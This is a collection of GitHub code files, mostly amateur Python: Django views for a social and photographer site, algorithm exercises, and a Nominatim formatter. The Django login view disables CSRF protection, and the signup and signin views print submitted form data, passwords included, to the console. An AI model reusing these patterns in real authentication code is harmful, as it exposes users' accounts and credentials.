request.method=='POST':\n print('inside signup page ' , request.POST)\n form=Tes(request.POST)\n form = UserSignUpForm(request.POST)\n if form.is_valid():\n print('form is valid',form.cleaned_data)\n user =form.save()\n user.refresh_from_db()\n user.profile.first_name=form.cleaned_data.get('first_name')\n user.profile.last_name=form.cleaned_data.get('last_name')\n user.profile.is_photographer=form.cleaned_data.get('is_photographer')\n user.save()\n #user_creation= form.save(commit=False)\n #user_creation.user=request.user.id\n\n print('##############################')\n print(request.user.id)\n #user_creation.save()\n print('%%%%%%%%%%%%%%')\n #user=form.save()\n #Profile.objects.create(user=user,bio=request.POST.get('bio'),first_name=request.POST.get('first_name'),last_name=request.POST.get('last_name'))\n #print(form.cleaned_data)\n #user.profile.birth_date = form.cleaned_data.get('birth_date') \n #user.save()\n raw_password = form.cleaned_data.get('password1')\n print(form.cleaned_data)\t\n user = authenticate(username=user.username, password=raw_password)\n login(request, user)\n else:\n print(form.errors)\n\t #Profile.objects.create(first_name=first_name,last_name='lasyt')\n return redirect('/')\n else:\n print('get request called')\n form=UserCreationForm()\n args={'form':form}\n return render(request,\"photohireapp/sign-up.html\",args)\n return render(request, \n 'photohireapp/sign-in.html'\n )\n\n\n@csrf_exempt\ndef signin(request):\n if request.method =='POST':\n print(request.POST)\n form=LoginForm(request.POST)\n if form.is_valid():\n cd =form.cleaned_data\n user=authenticate(username = cd['email'] , password = cd['password'])\n if user:\n if user.is_active:\n login(request,user)\n return redirect('/user_profile/'+str(user.id))\n #return HttpResponse('Logged In Successfully !')\n else:\n return HttpResponse('Account has been disabled ')\n else:\n return HttpResponse('User does not Exist')\n else:\n\t print(form.errors)\n else:\n print('GET login called >>')\n form=LoginForm()\n return render(request , 'photohireapp/sign-in.html',{'form' :form})\n\n\n\n\n\n return render(request, \n 'photohireapp/sign-up.html'\n )\n\ndef about(request):\n return render(request, \n 'photohireapp/about.html'\n )\n\ndef search(request):\n # Get tag searched by user\n tag=request.GET['search']\n\n # contains case insensitive value of the query\n tagged_images = Images.objects.filter(tags__tag__icontains=tag)\n\n # Get all the tags\n all_tags = list(Tags.objects.all())\n random.shuffle(all_tags)\n tags_with_images = []\n for tag_ in all_tags:\n if Images.objects.filter(tags__tag__icontains=tag_).count()>0:\n tags_with_images.append(tag_)\n\n return render(request,\n 'photohireapp/search.html',\n {\n 'tagged_images': tagged_images,\n 'tag':tag,\n 'all_tags': tags_with_images\n }\n )\n\ndef user_profile(request, user_id):\n # if request.POST:\n # message=request.POST['message']\n # user_id=request.POST['user_id']\n # query=Comment(message=message) \n # query.user_id=user_id\n # query.save()\n\n comment_form = CommentForm()\n\n if request.method == 'POST':\n comment_form_with_data = CommentForm(request.POST)\n print(comment_form_with_data)\n comment_form_with_data.save()\n\n print(\"This works\")\n print(user_id)\n user_data = Profile.objects.get(id=user_id)\n comment = Comment.objects.filter(user_id=user_id)\n\n\n # Any number between 5 and 15\n n_recommended = random.randint(5,15)\n\n # randomly pick 'n_recommended' images from the database\n recommended_images = Images.objects.order_by('?')[:n_recommended]\n return render(request, 'photohireapp/profile.html', {\n 'user_data':user_data, \n 'recommended_images':recommended_images, \n 'n_recommended':n_recommended,\n 'comment': comment,\n 'comment_form': comment_form\n })\n","repo_name":"nishant184/django","sub_path":"photohireapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3974908912","text":"class Solution:\n # @param A, a list of integers\n # @param target, an integer to be searched\n # @return a list of length 2, [index1, index2]\n def searchRange(self, A, target):\n x = self.binSearch(A, 0, len(A) - 1, target)\n if x == -1: return [-1, -1]\n m = n = x\n while m >= 0 and A[m] == target: m -= 1\n while n <= len(A)-1 and A[n] == target: n += 1\n return [m + 1, n - 1]\n\n def binSearch(self, Array, left, right, target):\n if left > right: return -1\n mid = (left + right) / 2\n if Array[mid] == target:\n return mid \n elif Array[mid] > target:\n return self.binSearch(Array, left, mid - 1,target)\n else:\n return self.binSearch(Array, mid + 1, right, target)\n","repo_name":"wade123/Leetcode_Java_Python","sub_path":"Leetcode_Python/search_for_a_range.py","file_name":"search_for_a_range.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71605083627","text":"word1=input(\"enter a word:\")\n\nword2=input(\"enter another word:\")\n\nsrt1=sorted(word1)\n\nsrt2=sorted(word2)\n\nflag=0\n\nif(set(srt2).issubset(set(srt1))):\n flag=1\nif(flag):\n print(\"kangaroo\")\n\nelse:\n print(\"not kangaroo\") \n\n\n \n","repo_name":"deepakdpz/Pythonworks_Luminar","sub_path":"python_works/string/kangaroo.py","file_name":"kangaroo.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17088188315","text":"class Solution:\n def nearestExit(self, maze: List[List[str]], entrance: List[int]) -> int:\n def isvalid(p, q):\n return 0<=p None: \n self.base_folder_path = Path(f'{Config.values[\"RulesFolderPath\"]}/{self.exec_context.rule_name}/osmoscope-layer')\n self.file_name = self.extract_data('file_name', 'layer')\n self.data_format_url = self.extract_data('data_format_url', required=True)\n self.data['id'] = self.extract_data('id', default=self.exec_context.rule_name)\n\n def process(self, data_source_path: str) -> None:\n \"\"\"\n Create the JSON layer file containing the right data.\n \n It gets the GeoJSON url as data parameter and set it\n inside the layer file.\n \"\"\"\n self.add_last_update_date_layer_info()\n self.data[self.data_format_url] = data_source_path\n self.base_folder_path.mkdir(parents=True, exist_ok=True)\n full_path = self.base_folder_path / f'{self.file_name}.json'\n\n with open(full_path, 'w') as json_file:\n json.dump(self.data, json_file)\n \n file_url = f'{Config.values[\"WebPrefixPath\"]}/{self.exec_context.rule_name}/osmoscope-layer/{self.file_name}.json'\n self.add_layer_to_global_layers_file(file_url)\n \n def add_last_update_date_layer_info(self) -> None:\n \"\"\"\n Add a \"last_update\" field to the layer information.\n This field contains the date of the last database update. \n The date is extracted from the lastimportdate table of the database.\n \"\"\"\n with connect(Config.values['Dsn']) as conn:\n with conn.cursor() as cur:\n cur.execute(\"SELECT to_char(lastimportdate at time zone 'UTC', 'YYYY-MM-DD HH24:MI:SS UTC') FROM import_status\")\n last_update_date = cur.fetchone()\n if last_update_date:\n if not 'doc' in self.data:\n self.data['doc'] = {}\n self.data['doc']['last_update'] = last_update_date[0]\n\n def add_layer_to_global_layers_file(self, path: str) -> None:\n \"\"\"\n Add the newly created layer to the global layers file.\n If the global layers file doesn't exist it is created.\n \"\"\"\n folder_path = Path(f'{Config.values[\"RulesFolderPath\"]}')\n folder_path.mkdir(parents=True, exist_ok=True)\n # Check if the folder_path has a parent because /layers.json will require sudo permissions.\n full_path = folder_path / 'layers.json' if len(folder_path.parents) > 0 else Path('layers.json')\n full_path.touch(exist_ok=True)\n\n with open(full_path, 'r') as json_file:\n try:\n data = json.load(json_file)\n except:\n data = {\n 'name': 'Nominatim suspects',\n 'layers': []\n }\n if path not in data['layers']:\n data['layers'].append(path)\n with open(full_path, 'w') as json_file:\n json.dump(data, json_file)\n","repo_name":"osm-search/Nominatim-Data-Analyser","sub_path":"analyser/core/pipes/output_formatters/osmoscope_layer_formatter.py","file_name":"osmoscope_layer_formatter.py","file_ext":"py","file_size_in_byte":3224,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"19298001639","text":"#colorama is a library that allows us to print colored text to the console\nfrom colorama import Fore\nfrom colorama import Style\n\n#User can choose any one option like read ya write\noption = int(input('''Please select any operation: \n \n1) READ \n \n2) WRITE \n \nYour Choice: '''))\n\n#Taking input from the user\nfilename=input('enter_file_name=')\n\n#conditions are given to check the option\n\n#if user chooses 1 option then this condition wll be executed\nif option==1:\n #Read the text from the file\n with open(filename,'r') as f:\n #loop to read the text from the file\n \n for line in f:\n #Read the text from the file in terminal\n print(line,end='')\n\n# if user chooses 2 option then this condition will be executed \nelif option==2:\n #write the text into the file\n with open(filename,'a') as f:\n #take input from the user\n \n text=input('Enter text here=')\n #\\n is used to add new line\n f.write('\\n')\n\n #enter the text into the file\n f.write(text)\n\n #Message to text added Succesfully\n print(f'{Fore.YELLOW}Text is added successfully{Style.RESET_ALL}')","repo_name":"love870/documents","sub_path":"read_write_file.py","file_name":"read_write_file.py","file_ext":"py","file_size_in_byte":1171,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32312681694","text":"from django.http import HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse_lazy\nfrom signin.models import signup_model\nfrom .forms import ExperienceForm, AddressForm, SkillForm, InterestForm, Education_detailsForm, CertificationsForm,ProfilepicForm\nfrom .models import Experience, Address, Skill, Interest, Education_details, Certifications, user_profile, FollowNotification, Notification, Chats\nfrom profiles.models import Follow, Following, Follower\nfrom index.models import Posts\nfrom django.utils import timezone\nimport datetime\nimport pytz\n# Create your views here.\n\n#FORM OBJECTS\nexperience_form = ExperienceForm()\naddress_form = AddressForm()\nskill_form = SkillForm()\ninterest_form = InterestForm()\neducation_details_form = Education_detailsForm()\ncertifications_form = CertificationsForm()\n\n\n#REGISTRATION VARIABLE\nexp_registered = False\naddr_registered = False\nskl_registered = False\nintrst_registered = False\nedu_registered = False\ncert_registered = False\nover_registered = False\n\n#OVERVIEW FIELDS DATA VARIABLE\ndata_overview = \"\"\n\n#EXPERIENCE FIELDS DATA VARIABLES\ndata_company = \"\"\ndata_title = \"\"\ndata_location = \"\"\ndata_work_field = \"\"\ndata_from_date = None\ndata_to_date = None\ndata_descriptionExp = \"\"\n\n#ADDRESS FIELD DATA VARIABLES\ndata_locality = \"\"\ndata_city = \"\"\ndata_zip = \"\"\ndata_country = \"\"\n\n#SKILL FIELD DATA VARIABLES\ndata_skill_name = \"\"\n\n#INTEREST FIELD DATA VARIABLES\ndata_interest_name = \"\"\n\n#EDUCATION DETAILS FIELD DATA VARIABLES\ndata_school = \"\"\ndata_school_from = None\ndata_school_to = None\ndata_degree = \"\"\ndata_study_field = \"\"\ndata_descriptionEdu = \"\"\n\n#CERTIFICATION DETAILS FIELD DATA VARIABLES\ndata_certification_name = \"\"\ndata_authority = \"\"\ndata_cert_from = None\ndata_cert_to = None\ndata_cert_pic = None\n\n\n# TO CHAT WITH SOME ONE YOU HAVE TO FOLLOW HIM and HE HAS TO FOLLOW YOU BACK...??\n\nchats = []\nchat_name = \"\"\nchat_email = \"\"\nchat_image = None\n\ndef showchats(request):\n if request.session.has_key('username'):\n username = request.session['username']\n # user_details as ud\n ud = user_profile.objects.get(user_email=username)\n user_name = ud.user_name\n # chats = []\n # chat_name = \"\"\n # chat_email = \"\"\n if request.method == \"POST\":\n global chat_name\n global chat_email\n global chat_image\n chat_name = request.POST.get('chat_name')\n chat_email = request.POST.get('chat_email')\n chat_image=user_profile.objects.get(user_email=chat_email).user_image\n chat_details = []\n for c in ud.chats:\n if c.receiver_email == chat_email:\n chat_details.append(c)\n elif c.sender_email == chat_email:\n chat_details.append(c)\n\n\n # chat_timestap = [c.created_on for c in chat_details]\n # zipped_pairs = zip(chat_timestap, chat_details)\n # z = [x for _, x in sorted(zipped_pairs)]\n # z.reverse()\n # chats = z\n global chats\n chats = chat_details\n return chatView(request, chat_email, chat_name, chats, chat_image)\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n\ndef sendChats(request):\n if request.session.has_key('username'):\n username = request.session['username']\n # user_details as ud\n ud = user_profile.objects.get(user_email=username)\n user_name = ud.user_name\n # chats = []\n # chat_name = \"\"\n # chat_email = \"\"\n\n if request.method == \"POST\":\n recipient_name = request.POST.get('chat_name')\n recipient_email = request.POST.get('chat_email')\n\n global chat_name\n global chat_email\n global chat_image\n chat_name = recipient_name\n chat_email = recipient_email\n chat_image = user_profile.objects.get(user_email=chat_email).user_image\n message = request.POST.get('message')\n\n dt_utcnow = datetime.datetime.now(tz=pytz.UTC)\n created_on = dt_utcnow.astimezone(pytz.timezone('Asia/Kolkata'))\n print(created_on)\n print()\n print()\n print()\n\n # current user's chats list as chats_list1\n chats_list1 = ud.chats\n chats_list1.append(Chats(sender_name=user_name, sender_email=username, receiver_name=recipient_name, receiver_email=recipient_email, message=message, created_on=created_on))\n\n user_profile.objects.update_or_create(user_email=username , defaults={'chats': chats_list1,})\n\n # recipient_details as rd\n rd = user_profile.objects.get(user_email=recipient_email)\n\n # current user's frined's chats list as chats_list2\n chats_list2 = rd.chats\n chats_list2.append(Chats(sender_name=user_name, sender_email=username, receiver_name=recipient_name, receiver_email=recipient_email, message=message, created_on=created_on))\n\n user_profile.objects.update_or_create(user_email=recipient_email, defaults={'chats': chats_list2,})\n\n chat_details = []\n for c in ud.chats:\n if c.receiver_email == chat_email:\n chat_details.append(c)\n elif c.sender_email == chat_email:\n chat_details.append(c)\n\n # chat_timestap = [c.created_on for c in chat_details]\n # zipped_pairs = zip(chat_timestap, chat_details)\n # z = [x for _, x in sorted(zipped_pairs)]\n # z.reverse()\n # chats = z\n global chats\n chats = chat_details\n request.method = \"\"\n return chatView(request, chat_email, chat_name, chats,chat_image)\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n pass\n\n\ndef chatView(request, chat_email=\"\", chat_name=\"\", chats=[],chat_image=None):\n if request.session.has_key('username'):\n username = request.session['username']\n user_name = user_profile.objects.get(user_email=username).user_name\n user_img = user_profile.objects.get(user_email=username).user_image\n # follow_details as fd\n fd = Follow.objects.get(user_name=username)\n # user_details as ud\n ud = user_profile.objects.all()\n following_list = [f.email for f in fd.following]\n follower_list = [f.email for f in fd.follower]\n chats_list = []\n for f in following_list:\n if f in follower_list:\n chats_list.append(ud.filter(user_email=f)[0])\n return render(request, \"chat.html\", {'chat_image':chat_image,'user_img':user_img,'username':username, 'user_name':user_name, 'chats_list':chats_list, 'chat_email':chat_email, 'chat_name':chat_name, 'chats':chats})\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n\ndef my_profile_feed(request):\n if request.session.has_key('username'):\n global over_registered\n global exp_registered\n global addr_registered\n global skl_registered\n global intrst_registered\n global edu_registered\n global cert_registered\n over_registered = False\n exp_registered = False\n addr_registered = False\n skl_registered = False\n intrst_registered = False\n edu_registered = False\n cert_registered = False\n username = request.session['username']\n user_name = user_profile.objects.get(user_email=username).user_name\n profile_details = user_profile.objects.get(user_email = username)\n user_img = user_profile.objects.get(user_email=username).user_image\n\n overview = profile_details.overview\n experience_list = []\n address = profile_details.address\n skill_list = []\n interest_list = []\n edu_details_list = []\n cert_list = []\n experience_list = profile_details.experience\n experience_list.reverse()\n skill_list = profile_details.skills\n skill_list.reverse()\n interest_list = profile_details.interests\n interest_list.reverse()\n edu_details_list = profile_details.education_details\n edu_details_list.reverse()\n cert_list = profile_details.certifications\n cert_list.reverse()\n\n experience_form = ExperienceForm()\n address_form = AddressForm()\n skill_form = SkillForm()\n interest_form = InterestForm()\n education_details_form = Education_detailsForm()\n certifications_form = CertificationsForm()\n profilepic= ProfilepicForm()\n if request.method == 'POST':\n file = request.POST.get('image_upload')\n\n if file == 'image_up':\n profilepic = ProfilepicForm(request.POST, request.FILES)\n if profilepic.is_valid():\n if 'user_image' in request.FILES:\n user_image = request.FILES['user_image']\n\n user_details = user_profile.objects.get(user_email=username)\n updated_details = {'user_name': user_details.user_name,\n 'user_email': user_details.user_email,\n 'overview': user_details.overview,\n 'user_image': user_image,\n 'experience': user_details.experience,\n 'address': user_details.address,\n 'education_details': user_details.education_details,\n 'skills': user_details.skills,\n 'interests': user_details.interests,\n 'certifications': user_details.certifications\n }\n user_profile.objects.update_or_create(user_email=username, defaults=updated_details)\n return HttpResponseRedirect(request.path_info)\n # print(\"O: \"+request.POST.get(\"save_overview\"))\n if request.POST.get('save_overview') == \"Save\":\n print(\"OVERVIEW: \"+request.POST.get('save_overview'))\n overview = request.POST.get('overview')\n if request.POST.get(\"save_experience\") == \"Save\":\n print(\"EXPERIENCE: \"+request.POST.get(\"save_experience\"))\n\n data_company = request.POST.get(\"company\")\n data_title = request.POST.get(\"title\")\n data_location = request.POST.get(\"location\")\n data_work_field = request.POST.get(\"work_field\")\n data_from_date = request.POST.get(\"from_date\")\n data_to_date = request.POST.get(\"to_date\")\n data_descriptionExp = request.POST.get(\"descriptionExp\")\n\n experience_list.append(Experience(company=data_company, title = data_title, location=data_location, work_field=data_work_field,\n from_date=data_from_date, to_date=data_to_date, descriptionExp=data_descriptionExp))\n if request.POST.get(\"save_edu_details\") == \"Save\":\n print(\"EDUCATION: \"+request.POST.get(\"save_edu_details\"))\n education_details_form = Education_detailsForm(request.POST)\n if education_details_form.is_valid():\n data_school = education_details_form.cleaned_data['school']\n data_school_from = education_details_form.cleaned_data['school_from']\n data_school_to = education_details_form.cleaned_data['school_to']\n data_degree = education_details_form.cleaned_data['degree']\n data_study_field = education_details_form.cleaned_data['study_field']\n data_descriptionEdu = education_details_form.cleaned_data['descriptionEdu']\n edu_details_list.append(Education_details(school=data_school, school_from=data_school_from, school_to=data_school_to, degree=data_degree,\n study_field=data_study_field, descriptionEdu=data_descriptionEdu))\n\n if request.POST.get(\"save_address\") == \"Save\":\n print(\"ADDRESS: \"+request.POST.get(\"save_address\"))\n address_form = AddressForm(request.POST)\n if address_form.is_valid():\n data_locality = address_form.cleaned_data['locality']\n data_city = address_form.cleaned_data['city']\n data_zip = address_form.cleaned_data['zip']\n data_state = address_form.cleaned_data['state']\n data_country = address_form.cleaned_data['country']\n address = Address(locality=data_locality, city=data_city, zip=data_zip, state=data_state, country=data_country)\n\n if request.POST.get(\"save_interest\") == \"Save\":\n print(\"INTEREST: \"+request.POST.get(\"save_interest\"))\n interest_form = InterestForm(request.POST)\n if interest_form.is_valid():\n data_interest_name = interest_form.cleaned_data['interest_name']\n interest_list.append(Interest(interest_name=data_interest_name))\n\n if request.POST.get(\"save_cert_details\") == \"Save\":\n print(\"CERTIFICATION: \"+request.POST.get(\"save_cert_details\"))\n certifications_form = CertificationsForm(request.POST)\n if certifications_form.is_valid():\n data_certification_name = certifications_form.cleaned_data['certification_name']\n data_authority = certifications_form.cleaned_data['authority']\n data_cert_from = certifications_form.cleaned_data['cert_from']\n data_cert_to = certifications_form.cleaned_data['cert_to']\n data_cert_pic = certifications_form.cleaned_data['cert_pic']\n cert_list.append(Certifications(certification_name=data_certification_name, authority=data_authority, cert_from=data_cert_from,\n cert_to=data_cert_to, cert_pic=data_cert_pic))\n\n if request.POST.get(\"save_skill\") == \"Save\":\n print(\"SKILL: \"+request.POST.get(\"save_skill\"))\n skill_form = SkillForm(request.POST)\n if skill_form.is_valid():\n data_skill_name = skill_form.cleaned_data['skill_name']\n skill_list.append(Skill(skill_name=data_skill_name))\n\n updated_details = {'user_name':user_name, 'user_email':username, 'overview':overview, 'experience':experience_list,\n 'address':address, 'skills':skill_list, 'interests':interest_list,\n 'education_details':edu_details_list, 'certifications':cert_list}\n user_profile.objects.update_or_create(user_email=username, defaults=updated_details)\n profile_details = user_profile.objects.get(user_email = username)\n if Follow.objects.filter(user_name=username).exists():\n nfollower = len(Follow.objects.get(user_name=username).follower)\n nfollowing = len(Follow.objects.get(user_name=username).following)\n else:\n nfollower = 0\n nfollowing = 0\n count = 0\n postlist = []\n postlist = Posts.objects.filter(author=username, created_on__lte=timezone.now()).order_by('-created_on')\n\n # latest 5 notifications\n notifications = user_profile.objects.get(user_email=username).notification[-5:] + user_profile.objects.get(user_email=username).follow_notification[-5:]\n notifications_timestamp = [n.created_on for n in notifications]\n zipped_pairs = zip(notifications_timestamp, notifications)\n z = [x for _, x in sorted(zipped_pairs)]\n notifications = z[-5:]\n\n chats_list = user_profile.objects.get(user_email=username).chats\n chats_list.reverse()\n chats = []\n chats_count = 0\n for c in chats_list:\n if chats_count < 5:\n if c.sender_email != username:\n chats.append(c)\n chats_count += 1\n else:\n break\n return render(request, \"my_profile_feed.html\", {'profilepic': profilepic,'user_img':user_img,'user_name': user_name, 'username': username, 'postlist':postlist, 'experience_form':experience_form, 'address_form':address_form, 'skill_form':skill_form,\n 'interest_form':interest_form, 'education_details_form':education_details_form, 'certifications_form':certifications_form,\n 'profile_details':profile_details, 'experience_list':experience_list, 'skill_list':skill_list, 'interest_list':interest_list,\n 'edu_details_list':edu_details_list, 'cert_list':cert_list, 'follower':nfollower,'following':nfollowing, 'notifications':notifications, 'chats':chats})\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n\ndef deleteDetailsView(request):\n if request.session.has_key('username'):\n username = request.session['username']\n user_details = user_profile.objects.get(user_email = username)\n overview = user_details.overview\n experience = user_details.experience\n address = user_details.address\n skills = user_details.skills\n interests = user_details.interests\n education_details = user_details.education_details\n certifications = user_details.certifications\n notification = user_details.notification\n\n\n if request.GET.get('exp-delete') == 'delete':\n index = request.GET.get('counter')\n experience.remove(experience[int(index)-1])\n\n if request.GET.get('addr-delete') == 'delete':\n address = Address()\n\n if request.GET.get('edu-delete') == 'delete':\n index = request.GET.get('counter')\n education_details.remove(education_details[int(index)-1])\n\n if request.GET.get('cert-delete') == 'delete':\n index = request.GET.get('counter')\n certifications.remove(certifications[int(index)-1])\n\n if request.GET.get('skill-delete') == 'delete':\n index = request.GET.get('counter')\n skills.remove(skills[int(index)-1])\n\n if request.GET.get('interest-delete') == 'delete':\n index = request.GET.get('counter')\n interests.remove(interests[int(index)-1])\n\n updated_details = {\n 'user_name': user_details.user_name,\n 'user_email': user_details.user_email,\n 'overview': overview,\n 'experience': experience,\n 'address': address,\n 'skills': skills,\n 'interests': interests,\n 'education_details': education_details,\n 'certifications': certifications,\n 'notification': notification,\n }\n\n user_profile.objects.update_or_create(user_email=username, defaults=updated_details)\n return my_profile_feed(request)\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n\ndef customViewProfile(request):\n if request.session.has_key('username'):\n username = request.session['username']\n user_name = user_profile.objects.get(user_email=username).user_name\n profile_user_email = request.GET.get('profile_user_email')\n profile_user_name = user_profile.objects.get(user_email=profile_user_email).user_name\n user_profile_details = user_profile.objects.get(user_email = profile_user_email)\n user_img = user_profile_details.user_image\n\n if request.method == \"GET\" and request.GET.get(\"follow_button\") == \"Follow\":\n # follow_registered = False\n following_email = request.GET.get(\"profile_user_email\")\n following_name = user_profile.objects.get(user_email=following_email).user_name\n print(following_name)\n print()\n print()\n print()\n #FOLLOW LOGIC HERE\n username = request.session['username']\n follower_list = []\n following_list = []\n if Follow.objects.filter(user_name=username).exists():\n follow_details1 = Follow.objects.get(user_name = username)\n\n for i in follow_details1.follower:\n follower_list.append(Follower(name=i.name, email=i.email))\n for i in follow_details1.following:\n following_list.append(Following(name=i.name, email=i.email))\n\n # follower_list.append(Follower(name=, email=foll)))\n following_list.append(Following(name=following_name, email=following_email))\n following_update_details = {'user_name':username, 'follower':follower_list, 'following':following_list}\n Follow.objects.update_or_create(user_name=username, defaults=following_update_details)\n current_user_followings = following_list\n\n follower_list = []\n following_list = []\n if Follow.objects.filter(user_name=following_email).exists():\n follow_details2 = Follow.objects.get(user_name = following_email)\n for i in follow_details2.follower:\n follower_list.append(Follower(name=i.name, email=i.email))\n for i in follow_details2.following:\n following_list.append(Following(name=i.name, email=i.email))\n follower_name = user_profile.objects.get(user_email=username).user_name\n follower_list.append(Follower(name=follower_name, email=username))\n follower_update_details = {'user_name':following_email, 'follower':follower_list, 'following':following_list}\n Follow.objects.update_or_create(user_name=following_email, defaults=follower_update_details)\n # follow_details.\n\n user_details = user_profile.objects.get(user_email=following_email)\n notification_list = user_details.follow_notification\n noti_msg = str(user_name) + \"(@\" + str(username) + \") has followed you...\"\n notification_list.append(FollowNotification(author=username, text=noti_msg, created_on=timezone.now()))\n user_updates = {'user_name': user_details.user_name, 'user_email': user_details.user_email,\n 'overview': user_details.overview,\n 'experience': user_details.experience, 'address': user_details.address,\n 'skills': user_details.skills, 'interests': user_details.interests,\n 'education_details': user_details.education_details,\n 'certifications': user_details.certifications, 'notification': user_details.notification, 'follow_notification': notification_list}\n user_profile.objects.update_or_create(user_email=user_details.user_email, defaults=user_updates)\n print(request.path_info)\n print()\n print()\n\n elif request.GET.get(\"follow_button\") == \"UnFollow\":\n #UNFOLLOW LOGIC HERE\n following_name = request.GET.get(\"profile_user_name\")\n following_email = request.GET.get(\"profile_user_email\")\n\n follows1 = Follow.objects.get(user_name = username)\n followings = []\n followers = []\n for f in follows1.following:\n if f.email == following_email:\n pass\n else:\n followings.append(Following(name=f.name, email=f.email))\n for f in follows1.follower:\n followers.append(Follower(name=f.name, email=f.email))\n follow_update_details1 = {'user_name':username, 'follower':followers, 'following':followings}\n Follow.objects.update_or_create(user_name=username, defaults=follow_update_details1)\n\n follows2 = Follow.objects.get(user_name = following_email)\n followings = []\n followers = []\n for f in follows2.following:\n followings.append(Following(name=f.name, email=f.email))\n for f in follows2.follower:\n if f.email == username:\n pass\n else:\n followers.append(Follower(name=f.name, email=f.email))\n follow_update_details2 = {'user_name':following_email, 'follower':followers, 'following':followings}\n Follow.objects.update_or_create(user_name=following_email, defaults=follow_update_details2)\n\n if Follow.objects.filter(user_name=username).exists():\n nfollower = len(Follow.objects.get(user_name=profile_user_email).follower)\n nfollowing = len(Follow.objects.get(user_name=profile_user_email).following)\n else:\n nfollower = 0\n nfollowing = 0\n count = 0\n\n current_user_follow_details = Follow.objects.get(user_name = username)\n current_user_followings = []\n for i in current_user_follow_details.following:\n current_user_followings.append(i.email)\n\n # latest 5 notifications\n notifications = user_profile.objects.get(user_email=username).notification[-5:] + user_profile.objects.get(user_email=username).follow_notification[-5:]\n notifications_timestamp = [n.created_on for n in notifications]\n zipped_pairs = zip(notifications_timestamp, notifications)\n z = [x for _, x in sorted(zipped_pairs)]\n notifications = z[-5:]\n\n chats_list = user_profile.objects.get(user_email=username).chats\n chats_list.reverse()\n chats = []\n chats_count = 0\n for c in chats_list:\n if chats_count < 5:\n if c.sender_email != username:\n chats.append(c)\n chats_count += 1\n else:\n break\n return render(request, \"customViewProfile.html\", {'user_img':user_img, 'username':username, 'user_name':user_name, 'profile_user_name':profile_user_name, 'profile_user_email':profile_user_email, 'current_user_followings':current_user_followings, 'user_profile_details':user_profile_details, 'follower':nfollower,'following':nfollowing, 'notifications':notifications, 'chats': chats})\n else:\n return HttpResponseRedirect(reverse_lazy('signin:signin'))\n","repo_name":"sanujsriv/eCOSystem-MajorSSS","sub_path":"eCOSystem/my_profile_feed/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":26830,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"26065404105","text":"# Write a program that takes an integer as input and prints out whether that integer is prime or not.\n \nnumber = int(input(\"Enter the number : \")) \ni = 2\nwhile i < number:\n if number % i == 0:\n break\n else: i = i + 1\nif number == i and number > 1 and number % 1 == 0:\n print(\"Pirminis\")\nelse: print (\"NEpirminis\")\n\n\n\n\n\n\n","repo_name":"LauraZabin/PhytonPracticalLZ","sub_path":"Tasks 03.09/5 task.py","file_name":"5 task.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72213710508","text":"class StatsFactory():\n def __init__(self, *args,**kwargs):\n self.help()\n self.data = *args\n self._params = kwargs\n \n def fit(self,verbose=True):\n import statsmodels.api as sm\n from scipy import stats\n import numpy as np\n \n data = self.data\n self._normal = stats.normaltest(data) # normaltest result\n self._equal_var = stats.levene(data)\n self._mean = [np.mean(d) for d in data]\n self._sem = [stats.sem(d) for d in data]\n ## Check Group Sizes\n self._n = [len(x) for x in data]\n \n \n def help(self):\n \"\"\"Display Hypothesis testing assumption and workflow\"\"\"\n workflow=\"\"\"TO DO: DISPLAY OUTLINE FROM NOTES \"\"\"\n ","repo_name":"jirvingphd/fsds_100719_cohort_notes","sub_path":"py_files/StatsFactory.py","file_name":"StatsFactory.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"28868193188","text":"def g(m, n):\n grid = [-1 for x in range(n + 1)]\n \n def f(m, n):\n if grid[n] != -1:\n return grid[n]\n elif n < m:\n grid[n] = 1\n return grid[n]\n else:\n result = f(m, n - 1)\n for i in range(m, n + 1):\n result += f(m, n - i - 1)\n grid[n] = result\n return grid[n]\n \n return f(m, n)\n\nprint (g(3, 50))\n","repo_name":"g-d-l/project_euler","sub_path":"done/114.py","file_name":"114.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71077948588","text":"from tests.classes import TestBase\nfrom datetime import datetime\nfrom uuid import uuid4\nimport re\n\n\nREQUEST_ID_REGEXP = re.compile('^[0-9]{10},[a-f0-9]{8}-[a-f0-9]{4}-4[a-f0-9]{3}-[89ab][a-f0-9]{3}-[a-f0-9]{12}\\Z', re.I)\n\n\ndef checkRequestId(requestId):\n\n match = REQUEST_ID_REGEXP.match(requestId)\n return match is not None\n\n\nclass TestRequestId(TestBase):\n \"\"\"\n Test getVersion\n \"\"\"\n def test_server_requestid(self):\n \"\"\"\n :description: Getting the version to check requestId with no requestId in request\n :resources: '/version'\n \"\"\"\n reply = self.FacesApi.getVersion()\n self.assertTrue(checkRequestId(reply.headers['Luna-Request-Id']))\n\n def test_badformat_requestid(self):\n \"\"\"\n :description: Getting the version to check requestId with bad format requestId in request\n :resources: '/version'\n \"\"\"\n requestId = 'bad format request id'\n reply = self.FacesApi.getVersion(lunaRequestId=requestId)\n self.assertTrue(checkRequestId(reply.headers['Luna-Request-Id']))\n\n def 